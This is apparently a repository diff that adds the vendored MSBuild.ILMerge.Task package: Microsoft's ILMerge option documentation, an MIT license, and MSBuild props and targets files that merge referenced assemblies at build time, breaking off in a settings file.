Research in Software Engineering (RiSE)<br/>
|
||||
Microsoft Research<br/>
|
||||
Copyright © Microsoft Corporation. All rights reserved.
|
||||
|
||||
# 1. Introduction
|
||||
|
||||
This document describes the ILMerge utility which merges multiple .NET assemblies into a single assembly. However, some .NET assemblies may not be able to be merged because they may contain features such as unmanaged code. I would highly recommend using peverify (the .NET Framework SDK tool) on the output of ILMerge to guarantee that the output is verifiable and will load in the .NET runtime.
|
||||
|
||||
ILMerge is packaged as a console application. But all of its functionality is also accessible programmatically. Note that Visual Studio **does** allow one to add an executable as a reference, so you can write a client that uses ILMerge as a library.
|
||||
|
||||
ILMerge takes a set of _input assemblies_ and merges them into one _target assembly_. The first assembly in the list of input assemblies is the _primary assembly_. When the primary assembly is an executable, then the target assembly is created as an executable with the same entry point as the primary assembly. Also, if the primary assembly has a strong name, and a .snk file is provided, then the target assembly is re-signed with the specified key so that it also has a strong name.
|
||||
|
||||
Note that anything that depended upon any of the names of the input assemblies, e.g., configuration files, must be updated to refer instead to the name of the target assembly.
|
||||
|
||||
Any Win32 Resources in the primary assembly are copied over into the target assembly.
|
||||
|
||||
There are many options that control the behavior of ILMerge. These are described in the next section.
|
||||
|
||||
# 2. Public Interface
|
||||
|
||||
The public interface for ILMerge is defined in the ILMerging namespace as the class ILMerge.
|
||||
|
||||
```csharp
|
||||
namespace ILMerging
|
||||
{
|
||||
public class ILMerge { }
|
||||
}
|
||||
```
|
||||
|
||||
To use this class programmatically, just create an instance using the default (nullary) constructor. There are several properties and methods which are used to affect the behavior of the merging. The method `Merge()` is called to actually perform the merging.
|
||||
|
||||
## 2.1 AllowDuplicateType
|
||||
|
||||
```csharp
|
||||
public void AllowDuplicateType(string typeName);
|
||||
```
|
||||
|
||||
The normal behavior of ILMerge is to not allow there to be more than one public type with the same name. If such a duplicate is found, then an exception is thrown. However, ILMerge can just rename the type so that it no longer causes a conflict. For private types, this is not a problem since no outside client can see it anyway, so ILMerge just does the renaming by default. For public types, it is not often a useful feature to have it renamed. However, there are situations where it is needed. In particular, for obfuscated assemblies, it seems that the obfuscator defines an attribute and creates an assembly-level attribute for the obfuscated assembly using that attribute. This would mean that obfuscated assemblies cannot be merged.
|
||||
|
||||
So this option allows the user to either allow all public types to be renamed when they are duplicates, or to specify it for arbitrary type names. On the command line, there can be as many options as desired, if followed by a colon and a type name, otherwise just specify it alone with no colon (and type name) to allow all duplicates.
|
||||
|
||||
When used through the API, an argument of "null" means to allow all public types to be renamed.
|
||||
|
||||
**Default:** no duplicates of public types allowed
|
||||
|
||||
**Command line option:** `[/allowDup[:typeName]]*`
|
||||
|
||||
## 2.2 AllowMultipleAssemblyLevelAttributes
|
||||
|
||||
```csharp
|
||||
public bool AllowMultipleAssemblyLevelAttributes { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, then if the CopyAttributes property (Section 2.7) is also set, any assembly-level attributes names that have the same type are copied over into the target directory as long as the definition of the attribute type specifies that "AllowMultiple" is true.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/allowMultiple`
|
||||
|
||||
## 2.3 AllowWildCards
|
||||
|
||||
```csharp
|
||||
public bool AllowWildCards { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, any wild cards in file names are expanded and all matching files will be used as input. Note that because the wild card matching is done by a call to Directory.GetFiles, it does not allow the characters ".." to appear in a file name. So if you want to specify a relative path containing ".." to move up a directory, you will have to use it with the "/lib" option (Section 2.20). That option does allow the use of ".." to move up directories.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/wildcards`
|
||||
|
||||
## 2.4 AllowZeroPeKind
|
||||
|
||||
```csharp
|
||||
public bool AllowZeroPeKind { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, then if an assembly's PeKind flag (this is the value of the field listed as .corflags in the Manifest) is zero it will be treated as if it was ILonly. This can be used to allow C++ assemblies to be merged; it does not appear that the C++ compiler writes the value as ILonly. However, if such an assembly has any non-IL features, then they will probably not be copied over into the target assembly correctly. So please use this option with caution.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/zeroPeKind`
|
||||
|
||||
## 2.5 AttributeFile
|
||||
|
||||
```csharp
|
||||
public string AttributeFile { get; set; }
|
||||
```
|
||||
|
||||
If this is set before calling Merge, then it specifies the path and filename to an _atttribute assembly_, an assembly that will be used to get all of the assembly-level attributes such as Culture, Version, etc. It will also be used to get the Win32 Resources from. It is mutually exclusive with the CopyAttributes property (Section 2.7). When it is not specified, then the Win32 Resources from the primary assembly are copied over into the target assembly. If it is not a full path, then the current directory is used.
|
||||
|
||||
**Default:** `null`
|
||||
|
||||
**Command line option:** `/attr:filename`
|
||||
|
||||
## 2.6 Closed
|
||||
|
||||
```csharp
|
||||
public bool Closed { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, then the "transitive closure" of the input assemblies is computed and added to the list of input assemblies. An assembly is considered part of the transitive closure if it is referenced, either directly or indirectly, from one of the originally specified input assemblies and it has an external reference to one of the input assemblies, or one of the assemblies that has such a reference. Complicated, but that is life...
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/closed`
|
||||
|
||||
## 2.7 CopyAttributes
|
||||
|
||||
```csharp
|
||||
public bool CopyAttributes { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, then the assembly level attributes of each input assembly are copied over into the target assembly. Any duplicate attribute overwrites a previously copied attribute. If you want to allow duplicates (for those attributes whose type specifies "AllowMultiple" in their definition), then you can also set the AllowMultipleAssemblyLevelAttributes (Section 2.2). The input assemblies are processed in the order they are specified. This option is mutually exclusive with specifying an attribute assembly, i.e., the property AttributeFile (Section 2.5). When an attribute assembly is specified, then no assembly-level attributes are copied over from the input assemblies.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/copyattrs`
|
||||
|
||||
## 2.8 DebugInfo
|
||||
|
||||
```csharp
|
||||
public bool DebugInfo { get; set; }
|
||||
```
|
||||
|
||||
When this is set to true, ILMerge creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies. If you do not want a .pdb file created for the output assembly, either set this property to false or else specify the /ndebug option at the command line.
|
||||
|
||||
**Default:** `true`
|
||||
|
||||
**Command line option:** `/ndebug`
|
||||
|
||||
## 2.9 DelaySign
|
||||
|
||||
```csharp
|
||||
public bool DelaySign { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, then the target assembly will be delay signed. This can be set only in conjunction with the `/keyfile` option (Section 2.13).
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
## 2.10 ExcludeFile
|
||||
|
||||
```csharp
|
||||
public string ExcludeFile { get; set; }
|
||||
```
|
||||
|
||||
This property is used only in conjunction with the Internalize property (Section 2.12). When this is set before calling Merge, it indicates the path and filename that will be used to identify types that are not to have their visibility modified. If Internalize is true, but ExcludeFile is "", then all types in any assembly other than the primary assembly are made non-public. Setting this property implicitly sets Internalize to true.
|
||||
|
||||
The contents of the file should be one regular expression per line. The syntax is that defined in the .NET namespace System.Text.RegularExpressions for regular expressions. The regular expressions are matched against each type's full name, e.g., "System.Collections.IList". If the match fails, it is tried again with the assembly name (surrounded by square brackets) prepended to the type name. Thus, the pattern "\\[A\\].\\\*" excludes all types in assembly A from being made non-public. (The backslashes are required because the string is treated as a regular expression.) The pattern "N.T" will match all types named T in the namespace named N no matter what assembly they are defined in.
|
||||
|
||||
It is important to note that the regular expressions are _not_ anchored to the beginning of the string; if this is desired, use the appropriate regular expression operator characters to do so.
|
||||
|
||||
**Default:** ""
|
||||
|
||||
**Command line option:** `/internalize[:excludeFile]`
|
||||
|
||||
## 2.11 FileAlignment
|
||||
|
||||
```csharp
|
||||
public int FileAlignment { get; set; }
|
||||
```
|
||||
|
||||
This controls the file alignment used for the target assembly. The setter sets the value to the largest power of two that is no larger than the supplied argument, and is at least 512.
|
||||
|
||||
**Default:** `512`
|
||||
|
||||
**Command line option:** `/align:n`
|
||||
|
||||
## 2.12 Internalize
|
||||
|
||||
```csharp
|
||||
public bool Internalize { get; set; }
|
||||
```
|
||||
|
||||
This controls whether types in assemblies _other than_ the primary assembly have their visibility modified. When it is true, then all non-exempt types that are visible outside of their assembly have their visibility modified so that they are not visible from outside of the merged assembly. A type is exempt if its _full name_ matches a line from the ExcludeFile (Section 2.10) using the .NET regular expression engine.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/internalize[:excludeFile]`
|
||||
|
||||
## 2.13 KeyFile
|
||||
|
||||
```csharp
|
||||
public string KeyFile { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, it specifies the path and filename to a .snk file. The target assembly will be signed with its contents and will then have a strong name. It can be used with the DelaySign property (Section 2.9) to have the target assembly delay signed. This can be done even if the primary assembly was fully signed.
|
||||
|
||||
**Default:** `null`
|
||||
|
||||
**Command line option:** `/keyfile:filename`
|
||||
|
||||
## 2.14 Log
|
||||
|
||||
```csharp
|
||||
public bool Log { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, then log messages are written. It is used in conjunction with the LogFile property. If Log is true, but LogFile is null, then log messages are written to Console.Out. To specify this behavior on the command line, the option "/log" can be given without a log file.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/log[:logfile]`
|
||||
|
||||
## 2.15 LogFile
|
||||
|
||||
```csharp
|
||||
public string LogFile { get; set; }
|
||||
```
|
||||
|
||||
When this is set before calling Merge, it indicates the path and filename that log messages are written to. If Log is true, but LogFile is null, then log messages are written to Console.Out.
|
||||
|
||||
**Default:** `null`
|
||||
|
||||
**Command line option:** `/log[:logfile]`
|
||||
|
||||
## 2.16 Merge
|
||||
|
||||
```csharp
|
||||
public void Merge();
|
||||
```
|
||||
|
||||
Once all desired options are set, this method performs the actual merging.
|
||||
|
||||
## 2.17 OutputFile
|
||||
|
||||
```csharp
|
||||
public string OutputFile { get; set; }
|
||||
```
|
||||
|
||||
This must be set before calling Merge. It specifies the path and filename that the target assembly will be written to.
|
||||
|
||||
**Default:** `null`
|
||||
|
||||
**Command line option:** `/out:filename`
|
||||
|
||||
## 2.18 PublicKeyTokens
|
||||
|
||||
```csharp
|
||||
public bool PublicKeyTokens { get; set; }
|
||||
```
|
||||
|
||||
This must be set before calling Merge. It indicates whether external assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true).
|
||||
|
||||
**Default:** `true`
|
||||
|
||||
**Command line option:** `/useFullPublicKeyForReferences`
|
||||
|
||||
## 2.19 SetInputAssemblies
|
||||
|
||||
```csharp
|
||||
public void SetInputAssemblies(string[] assems);
|
||||
```
|
||||
|
||||
When used programmatically, each element of the array should contain the path and filename of an input assembly. The first element of the array is considered to be the primary assembly.
|
||||
|
||||
## 2.20 SetSearchDirectories
|
||||
|
||||
```csharp
|
||||
public void SetSearchDirectories(string[] dirs);
|
||||
```
|
||||
|
||||
If specified, this sets the directories to be used to search for input assemblies. When used programmatically, each element of the array should contain a directory name. When specified on the command line, use a separate "/lib" option for each directory.
|
||||
|
||||
**Command line option:** `/lib:directory`
|
||||
|
||||
## 2.21 SetTargetPlatform
|
||||
|
||||
```csharp
|
||||
public void SetTargetPlatform(string platform, string dir);
|
||||
```
|
||||
|
||||
This method sets the .NET Framework for the target assembly to be the one specified by platform. Valid strings for the first argument are `v1`, `v1.1`, `v2`, and `v4`;. The `v` is case insensitive and is also optional. This way ILMerge can be used to "cross-compile", i.e., it can run in one version of the framework and generate the target assembly so it will run under a different assembly. The second argument is the directory in which `mscorlib.dll` is to be found.
|
||||
|
||||
**Command line option:** `/targetplatform:version,platformdirectory`
|
||||
|
||||
## 2.22 StrongNameLost
|
||||
|
||||
```csharp
|
||||
public bool StrongNameLost { get; }
|
||||
```
|
||||
|
||||
Once merging is complete, this property is true if and only if the primary assembly had a strong name, but the target assembly does not. This can occur when an .snk file is not specified, or if something goes wrong trying to read its contents.
|
||||
|
||||
## 2.23 TargetKind
|
||||
|
||||
```csharp
|
||||
public ILMerge.Kind { get; set; }
|
||||
```
|
||||
|
||||
This controls whether the target assembly is created as a library, a console application or as a Windows application. When it is not specified, then the target assembly will be the same kind as that of the primary assembly. (In that case, the file extensions found on the specified target assembly and the primary assembly must match.) When it is specified, then the file extension of the target assembly must match the specification.
|
||||
|
||||
The possible values are `ILMerge.Kind.{Dll, Exe, WinExe}`
|
||||
|
||||
**Default:** `ILMerge.Kind.SameAsPrimaryAssembly`
|
||||
|
||||
**Command line option:** `/target:(library|exe|winexe)`
|
||||
|
||||
## 2.24 UnionMerge
|
||||
|
||||
```csharp
|
||||
public bool { get; set; }
|
||||
```
|
||||
|
||||
When this is true, then types with the same name are all merged into a single type in the target assembly. The single type is the union of all of the individual types in the input assemblies: it contains all of the members from each of the corresponding types in the input assemblies. It cannot be specified at the same time as `/allowDup`.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/union`
|
||||
|
||||
## 2.25 Version
|
||||
|
||||
```csharp
|
||||
public System.Version Version { get; set; }
|
||||
```
|
||||
|
||||
When this has a non-null value, then the target assembly will be given its value as the version number of the assembly. When specified on the command line, the version is read in as a string and should look like "6.2.1.3" (but without the quote marks). The version must be a valid assembly version as defined by the attribute AssemblyVersion in the System.Reflection namespace.
|
||||
|
||||
**Default:** `null`
|
||||
|
||||
**Command line option:** `/ver:version`
|
||||
|
||||
## 2.26 XmlDocumentation
|
||||
|
||||
```csharp
|
||||
public bool XmlDocumentation { get; set; }
|
||||
```
|
||||
|
||||
This property controls whether XML documentation files are merged to produce an XML documentation file for the target assembly.
|
||||
|
||||
**Default:** `false`
|
||||
|
||||
**Command line option:** `/xmldocs`
|
||||
|
||||
# 3 Command Line Usage
|
||||
|
||||
The full command line for ILMerge is:
|
||||
|
||||
```
|
||||
ilmerge [/lib:directory]* [/log[:filename]] [/keyfile:filename [/delaysign]] [/internalize[:filename]]
|
||||
[/t[arget]:(library|exe|winexe)] [/closed] [/ndebug] [/ver:version] [/copyattrs [/allowMultiple]]
|
||||
[/xmldocs] [/attr:filename] ([/targetplatform:<version>[,<platformdir>]]|v1|v1.1|v2|v4)
|
||||
[/useFullPublicKeyForReferences] [/zeroPeKind] [/wildcards] [/allowDup[:typename]]*
|
||||
[/allowDuplicateResources] [/union] [/align:n]
|
||||
/out:filename <primary assembly> [<other assemblies>...]
|
||||
```
|
||||
|
||||
All options that take arguments can use either `:` or `=` as a separator. Options can be in any order, but all of the options must precede the list of input assemblies.
|
||||
|
||||
# 4 Troubleshooting
|
||||
|
||||
## 4.1 Input assembly not merged in correctly
|
||||
|
||||
A common problem is that after merging some assemblies, you get an error message stating that an input assembly was not merged in correctly because it is still listed as an external reference in the merged assembly. The most common cause of this problem is that one of the input assemblies, B, has an external reference to the incorrectly merged assembly, A, and also an external reference to another assembly, C, that itself has an external reference to A. Suppose the reference to C is to a method that takes an argument whose type is defined in A. Then the type signature of the method call to the method in C still refers to the type from A even in the merged assembly. After all, ILMerge cannot go and modify the assembly C so that it now depends on the type as it is defined in the output assembly after it has been merged!
|
||||
|
||||
The solution is to use the closed option (Section 2.6) to have ILMerge compute the transitive closure of the input assemblies to prevent this kind of "dangling reference". In the example, that would result in all three assemblies A, B, and C, being merged. There is no way to merge just A and B without there still being an external reference to A.
|
||||
|
||||
## 4.2 Merged assembly causes a runtime error (not present in the unmerged assemblies)
|
||||
|
||||
The most frequent cause of problems when executing the target assembly is that ILMerge has no way to merge resources. Therefore resources are just copied over from the input assemblies into the target assembly. If these resources encode references to types defined in the input assemblies, then at runtime your program may fail because the type returned from the resource does not match the type as it is defined in the target assembly. You may even see a message that "type 'T' cannot be converted to type 'T'". This looks confusing because the messages do not show the assembly that each type is defined in. The actual error is that one type is defined in the input assembly while the other is defined in the target assembly.
|
||||
|
||||
I do not know of any way to have ILMerge do the right thing in such cases. There is no general way to decode resources and change any type references they contain.
|
||||
|
||||
# 5 Dependencies
|
||||
|
||||
ILMerge is a stand-alone assembly dependent only on the v4.0 .NET Framework. (It actually uses two other assemblies: the assembly that makes up CCI itself, `System.Compiler.dll`, and `AssemblyResolver.dll`, which provides a small component for finding and loading assemblies when requested by the CCI Reader. But those assemblies have been merged into ILMerge using ILMerge before it is distributed.)
|
||||
|
||||
# 6 Acknowledgements
|
||||
|
||||
Without [Herman Venter](https://github.com/hermanventer), this tool could not have been written. Not only because it completely depends on CCI to provide the underlying functionality for reading, transforming, and writing IL, but because of all of his help and support.
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
After Width: | Height: | Size: 2.3 KiB |
|
@ -0,0 +1,21 @@
|
|||
The MIT License (MIT)
|
||||
|
||||
Copyright (c) 2013-2016 Alexander Nosenko
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
BIN
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/MSBuild.ILMerge.Task.1.1.3.nupkg
vendored
Normal file
BIN
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/MSBuild.ILMerge.Task.1.1.3.nupkg
vendored
Normal file
Binary file not shown.
11
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.props
vendored
Normal file
11
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.props
vendored
Normal file
|
@ -0,0 +1,11 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<!-- try to import project-specific settings; also use fixed name that was injected into project by NuGet -->
|
||||
<PropertyGroup>
|
||||
<!-- at this point only MSBuild* property are available -->
|
||||
<MSBuildIlMerge1>$(MSBuildProjectDirectory)\$(MSBuildProjectName).ILMerge.props</MSBuildIlMerge1>
|
||||
<MSBuildIlMerge2>$(MSBuildProjectDirectory)\ILMerge.props</MSBuildIlMerge2>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(MSBuildIlMerge1)" Condition="Exists($(MSBuildIlMerge1))"/>
|
||||
<Import Project="$(MSBuildIlMerge2)" Condition="Exists($(MSBuildIlMerge2))"/>
|
||||
</Project>
|
116
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets
vendored
Normal file
116
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets
vendored
Normal file
|
@ -0,0 +1,116 @@
|
|||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<!-- give project-specific settings reasonable defaults -->
|
||||
<ILMergePackagesPath Condition=" $(ILMergePackagePath) == '' ">$(SolutionDir)packages</ILMergePackagesPath>
|
||||
<ILMergeOrderFile Condition=" $(ILMergeOrderFile) == '' ">$(MSBuildProjectDirectory)\ILMergeOrder.txt</ILMergeOrderFile>
|
||||
<ILMergeKeyFile Condition=" $(ILMergeKeyFile) == '' ">$(AssemblyOriginatorKeyFile)</ILMergeKeyFile>
|
||||
<ILMergeAssemblyVersion Condition=" $(ILMergeAssemblyVersion) == '' "></ILMergeAssemblyVersion>
|
||||
|
||||
<ILMergeAllowDuplicateType Condition=" $(ILMergeAllowDuplicateType) == '' "></ILMergeAllowDuplicateType>
|
||||
<ILMergeAllowMultipleAssemblyLevelAttributes Condition=" $(ILMergeAllowMultipleAssemblyLevelAttributes) == '' ">false</ILMergeAllowMultipleAssemblyLevelAttributes>
|
||||
<ILMergeAllowZeroPeKind Condition=" $(ILMergeAllowZeroPeKind) == '' ">false</ILMergeAllowZeroPeKind>
|
||||
<ILMergeCopyAttributes Condition=" $(ILMergeCopyAttributes) == '' ">false</ILMergeCopyAttributes>
|
||||
<ILMergeDebugInfo Condition=" $(ILMergeDebugInfo) == '' ">true</ILMergeDebugInfo>
|
||||
<ILMergeDelaySign Condition=" $(ILMergeDelaySign) == '' ">false</ILMergeDelaySign>
|
||||
<ILMergeFileAlignment Condition=" $(ILMergeFileAlignment) == '' ">512</ILMergeFileAlignment>
|
||||
<ILMergeInternalize Condition=" $(ILMergeInternalize) == '' ">false</ILMergeInternalize>
|
||||
<ILMergeInternalizeExcludeFile Condition=" $(ILMergeInternalizeExcludeFile) == '' "></ILMergeInternalizeExcludeFile>
|
||||
<ILMergeXmlDocumentation Condition=" $(ILMergeXmlDocumentation) == '' ">false</ILMergeXmlDocumentation>
|
||||
<ILMergePublicKeyTokens Condition=" $(ILMergePublicKeyTokens) == '' ">true</ILMergePublicKeyTokens>
|
||||
<ILMergeShouldLog Condition=" $(ILMergeShouldLog) == '' ">true</ILMergeShouldLog>
|
||||
<!--<ILMergeTargetKind Condition=" $(ILMergeTargetKind) == '' "></ILMergeTargetKind>-->
|
||||
<ILMergeUnionMerge Condition=" $(ILMergeUnionMerge) == '' ">false</ILMergeUnionMerge>
|
||||
<ILTargetPlatform Condition=" $(ILTargetPlatform) == '' ">40</ILTargetPlatform>
|
||||
<!--<ILMergeVersion Condition=" $(ILMergeVersion) == '' "></ILMergeVersion>-->
|
||||
|
||||
<ILMergeToolsPath Condition=" $(ILMergeToolsPath) == '' ">$(MSBuildThisFileDirectory)..\tools\</ILMergeToolsPath>
|
||||
</PropertyGroup>
|
||||
|
||||
<!-- decide what goes into output after compile-->
|
||||
<Target Name="SaveILMergeData" AfterTargets="CoreCompile">
|
||||
<Message Text="Transitive merge" Importance="high" Condition="$(ILMergeTransitive) == 'true'" />
|
||||
|
||||
<!-- all copy local assemblies referenced from this project that go to the executable except the main one-->
|
||||
<CreateItem Include="@(ReferencePath)" Condition=" '%(CopyLocal)' == 'true' ">
|
||||
<Output TaskParameter="Include" ItemName="MergedAssemblies"/>
|
||||
</CreateItem>
|
||||
|
||||
<!-- all copy local dependency assemblies-->
|
||||
<CreateItem Include="@(ReferenceDependencyPaths)" Condition=" '%(CopyLocal)' == 'true' ">
|
||||
<Output TaskParameter="Include" ItemName="MergedDependencies"/>
|
||||
</CreateItem>
|
||||
|
||||
<!-- all assemblies that doesn't so we use their directories as library path -->
|
||||
<CreateItem Include="@(ReferencePath)" Condition=" '%(CopyLocal)' == 'false' ">
|
||||
<Output TaskParameter="Include" ItemName="UnmergedAssemblies"/>
|
||||
</CreateItem>
|
||||
|
||||
<!-- all content items marked as copy always or newest -->
|
||||
<CreateItem Include="@(Content)" Condition=" '%(Content.CopyToOutputDirectory)' == 'Always' OR '%(Content.CopyToOutputDirectory)' == 'PreserveNewest' ">
|
||||
<Output TaskParameter="Include" ItemName="LocalContentFiles"/>
|
||||
</CreateItem>
|
||||
|
||||
<!-- add the main assembly as the first one -->
|
||||
<PropertyGroup Condition=" $(ILMergeTransitive) == 'true' ">
|
||||
<MergedAssemblies>@(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)');@(MergedDependencies->'%(FullPath)')</MergedAssemblies>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" $(ILMergeTransitive) == 'false' OR $(ILMergeTransitive) == '' ">
|
||||
<MergedAssemblies>@(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)')</MergedAssemblies>
|
||||
</PropertyGroup>
|
||||
|
||||
<PropertyGroup>
|
||||
<!-- Ideally we should copy all not-copy-local assemblies that are not in the ILMergeLibraryPath to -->
|
||||
<!-- a temp directory and add it to the start search path, but we keep it simple here -->
|
||||
<UnmergedAssemblies>@(UnmergedAssemblies->'%(FullPath)')</UnmergedAssemblies>
|
||||
<MergeOutputFile>$(TargetPath)</MergeOutputFile>
|
||||
</PropertyGroup>
|
||||
</Target>
|
||||
|
||||
<!-- do not copy copy-local assemblies, they will be merged -->
|
||||
<Target Name="_CopyFilesMarkedCopyLocal" />
|
||||
|
||||
<!-- override standard target our own merge-and-copy-content -->
|
||||
<Target Name="CopyFilesToOutputDirectory">
|
||||
<Message Text="Merge PDBs: $(ILMergeDebugInfo)" Importance="high" />
|
||||
<Message Text="Merged assemblies: $(MergedAssemblies)" Importance="high" />
|
||||
<Message Text="Not merged assemblies: $(UnmergedAssemblies)" Importance="normal" />
|
||||
<Message Text="Merged Output in: $(MergeOutputFile)" Importance="normal" />
|
||||
<Message Text="Key file: $(ILMergeKeyFile)" Importance="normal" />
|
||||
<Message Text="Libraries in: $(ILMergeLibraryPath)" Importance="normal" />
|
||||
<Message Text="Packages in: $(ILMergePackagesPath)" Importance="normal" />
|
||||
<Message Text="Merge order file: $(ILMergeOrderFile)" Importance="normal" />
|
||||
<Message Text="Internalization enabled: $(ILMergeInternalize)" Importance="normal" />
|
||||
<Message Text="Local content: @(LocalContentFiles)" Importance="low" />
|
||||
|
||||
<!-- run ILMerge -->
|
||||
<!-- not supported: AllowWildCards, Closed (use $Transitive instead), TargetKind (default), -->
|
||||
<MSBuild.ILMerge.Task
|
||||
KeyFile="$(ILMergeKeyFile)"
|
||||
OutputFile="$(MergeOutputFile)"
|
||||
LibraryPath="$(ILMergeLibraryPath)"
|
||||
InputAssemblies="$(MergedAssemblies)"
|
||||
LibraryAssemblies="$(UnmergedAssemblies)"
|
||||
PackagesDir="$(ILMergePackagesPath)"
|
||||
MergeOrderFile="$(ILMergeOrderFile)"
|
||||
AllowDuplicateType="$(ILMergeAllowDuplicateType)"
|
||||
AllowMultipleAssemblyLevelAttributes="$(ILMergeAllowMultipleAssemblyLevelAttributes)"
|
||||
AllowZeroPeKind="$(ILMergeAllowZeroPeKind)"
|
||||
CopyAttributes="$(ILMergeCopyAttributes)"
|
||||
DebugInfo="$(ILMergeDebugInfo)"
|
||||
DelaySign="$(ILMergeDelaySign)"
|
||||
FileAlignment="$(ILMergeFileAlignment)"
|
||||
Internalize="$(ILMergeInternalize)"
|
||||
InternalizeExcludeFile ="$(ILMergeInternalizeExcludeFile)"
|
||||
XmlDocumentation="$(ILMergeXmlDocumentation)"
|
||||
PublicKeyTokens="$(ILMergePublicKeyTokens)"
|
||||
ShouldLog="$(ILMergeShouldLog)"
|
||||
TargetPlatform="$(ILTargetPlatform)"
|
||||
UnionMerge="$(ILUnionMerge)" />
|
||||
<!-- copy content files marked as copy always or newest -->
|
||||
<Copy SourceFiles="@(LocalContentFiles)" DestinationFolder="$(OutputPath)" />
|
||||
<!-- copy config file (???) -->
|
||||
<CallTarget Targets="_CopyAppConfigFile" Condition="'%(IntermediateAssembly.Extension)' == '.exe'"/>
|
||||
</Target>
|
||||
<UsingTask AssemblyFile="$(ILMergeToolsPath)MSBuild.ILMerge.Task.dll" TaskName="MSBuild.ILMerge.Task" />
|
||||
</Project>
|
|
@ -0,0 +1,67 @@
|
|||
<?xml version="1.0" encoding="utf-8" ?>
|
||||
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<!-- -->
|
||||
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
|
||||
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
|
||||
<!-- -->
|
||||
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
|
||||
|
||||
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
|
||||
<ILMergeTransitive>true</ILMergeTransitive>
|
||||
|
||||
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
|
||||
<ILMergeLibraryPath></ILMergeLibraryPath>
|
||||
|
||||
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
|
||||
<ILMergePackagesPath></ILMergePackagesPath>
|
||||
|
||||
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
|
||||
<ILMergeOrderFile></ILMergeOrderFile>
|
||||
|
||||
<!-- The strong key file name if not specified in the project -->
|
||||
<ILMergeKeyFile></ILMergeKeyFile>
|
||||
|
||||
<!-- The assembly version if differs for the version of the main assembly -->
|
||||
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
|
||||
|
||||
<!-- added in Version 1.0.4 -->
|
||||
<ILMergeFileAlignment></ILMergeFileAlignment>
|
||||
|
||||
<!-- added in Version 1.0.4, default=none -->
|
||||
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
|
||||
|
||||
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
|
||||
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
|
||||
|
||||
<!-- See ILMerge documentation -->
|
||||
